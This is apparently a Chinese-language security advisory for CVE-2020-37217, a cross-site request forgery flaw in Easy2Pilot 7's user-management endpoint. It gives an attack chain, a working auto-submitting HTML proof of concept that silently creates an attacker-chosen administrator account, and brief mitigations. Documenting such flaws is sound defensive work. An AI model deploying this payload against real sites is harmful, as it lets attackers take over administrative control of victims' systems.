CVE-2020-37217 Easy2Pilot 7 CSRF漏洞

漏洞信息

漏洞编号

CVE-2020-37217

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Easy2Pilot 7

漏洞概述

Easy2Pilot 7版本中存在严重的跨站请求伪造（CSRF）安全漏洞。由于该应用程序在用户管理模块中未实施足够的CSRF防护机制，攻击者可以诱导已登录的管理员访问精心设计的恶意页面。通过构造针对`admin.php?action=add_user`接口的HTML表单并发送包含用户名和密码参数的POST请求，攻击者能够在未经管理员明确同意的情况下成功创建新的管理员账户，进而完全控制受影响系统。

技术细节

该漏洞的根本原因在于Easy2Pilot 7在处理“添加用户”请求时缺乏必要的跨站请求伪造防御措施。具体而言，`admin.php?action=add_user`接口在处理POST请求时，仅依赖浏览器的Cookie来验证管理员的会话状态，而未使用不可预测的CSRF令牌或验证Referer头等机制来确认请求来源的合法性。攻击者利用这一设计缺陷，可以创建一个包含自动提交表单的恶意HTML页面，表单的action属性指向受害系统的添加用户接口，并预设了恶意用户名和密码。当管理员在保持登录状态时访问该页面，浏览器会自动携带有效的会话Cookie发送请求。服务器端收到请求后，无法区分请求的真伪，误认为这是管理员本人的合法操作，从而执行了添加用户的逻辑，导致攻击者成功植入后门账户，获取系统最高权限。

攻击链分析

STEP 1

1. 侦察与准备

攻击者确认目标使用的是Easy2Pilot 7，并构造包含恶意HTML表单的网页，表单指向admin.php?action=add_user，并预设好新管理员的用户名和密码。

STEP 2

2. 投递攻击载荷

攻击者通过钓鱼邮件或即时通讯工具，将包含恶意HTML页面的URL发送给目标系统的管理员，诱导其点击访问。

STEP 3

3. 触发漏洞利用

管理员在已登录状态下访问恶意页面，浏览器自动解析HTML并向目标服务器发送带有管理员Cookie的POST请求。

STEP 4

4. 执行未授权操作

服务器接收到请求，验证Cookie有效后执行添加用户操作，成功创建攻击者预设的管理员账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2020-37217 -->
<!-- Save this as an .html file and host it. When an admin visits it, a new user is created. -->
<html>
  <body>
    <form action="http://target-site/admin.php?action=add_user" method="POST">
      <input type="hidden" name="username" value="hacker" />
      <input type="hidden" name="password" value="P@ssw0rd!" />
      <input type="submit" value="Click to win prize" />
    </form>
    <script>
      // Automatically submit the form when the page loads
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

Easy2Pilot 7

防御指南

临时缓解措施

建议管理员在完成系统管理操作后及时注销登录，不要点击来源不明的链接。在未修复漏洞前，可以暂时禁用浏览器的JavaScript或使用NoScript等扩展来降低风险，同时配置Web应用防火墙（WAF）规则以拦截异常的POST请求。